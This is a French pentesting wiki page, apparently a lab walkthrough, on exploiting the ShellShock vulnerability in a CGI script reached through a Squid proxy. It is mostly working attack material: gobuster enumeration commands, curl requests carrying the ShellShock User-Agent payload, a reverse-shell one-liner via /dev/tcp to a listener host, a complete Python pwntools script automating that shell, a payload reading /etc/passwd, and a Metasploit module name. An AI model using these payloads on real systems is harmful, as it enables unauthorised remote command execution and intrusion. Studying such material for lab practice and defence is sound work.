ShellShock (status) - Pentesting Web

Avec l'outil GoBuster, nous recherchons des chemins système

gobuster dir -u http://192.168.71.131/ --proxy http://192.168.71.131:3128 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 --add-slash

Dans ce cas, il trouve le chemin /cgi-bin/, qui peut être vulnérable à une attaque ShellShock:

Maintenant, dans ce même chemin, nous recherchons des fichiers avec des extensions sh, pl cgi, etc.

gobuster dir -u http://192.168.71.131/cgi-bin/ --proxy http://192.168.71.131:3128 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x pl,sh,cgi

ShellShock:

Avec curl, si nous faisons une requête, nous constatons que c'est la même commande que uptime:

curl -s http://127.0.0.1/cgi-bin/status --proxy http://192.168.71.131:3128

Alors, avec curl, nous utiliserons la vulnérabilité ShellShock pour exécuter des commandes (il faut toujours mettre le chemin absolu):

curl -s http://127.0.0.1/cgi-bin/status --proxy http://192.168.71.131:3128 -H "User-Agent: () { :; }; echo; /usr/bin/whoami"

Pour obtenir l'accès à la machine, nous exécuterons la commande suivante:

curl -s http://127.0.0.1/cgi-bin/status --proxy http://192.168.71.131:3128 -H "User-Agent: () { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.71.128/443 0>&1'"

Script Python Automatisé:

#!/usr/bin/python3
import sys, signal, requests, threading
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl+C handler
signal.signal(signal.SIGINT, def_handler)

main_url = "http://127.0.0.1/cgi-bin/status"
squid_proxy = {'http': 'http://192.168.71.131:3128'}
lport = 443

def shellshock_attack():
    headers = {'User-Agent': "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.71.128/443 0>&1'"}
    r = requests.get(main_url, headers=headers, proxies=squid_proxy)

if __name__ == '__main__':
    try:
        threading.Thread(target=shellshock_attack).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()

    if shell.sock is None:
        log.failure("Failed to establish connection")
        sys.exit(1)
    else:
        shell.interactive()

Exploitation avec BurpSuite

Dans BurpSuite, nous pouvons injecter la payload ShellShock dans l’en-tête User-Agent pour tenter d’exécuter des commandes sur le serveur cible :

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Si la vulnérabilité est présente, le serveur renverra le contenu du fichier /etc/passwd, indiquant que l'exécution de commandes est possible.

Exploitation avec Metasploit

Metasploit propose un exploit dédié à cette vulnérabilité :

Charger le module ShellShock :

use exploit/multi/http/apache_mod_cgi_bash_env_exec

Si l’exploit réussit, un shell est obtenu sur la machine cible.

Mis à jour il y a 11 mois

hashtagShellShock:

hashtagScript Python Automatisé:

hashtagExploitation avec BurpSuite

hashtagExploitation avec Metasploit

ShellShock:

Script Python Automatisé:

Exploitation avec BurpSuite

Exploitation avec Metasploit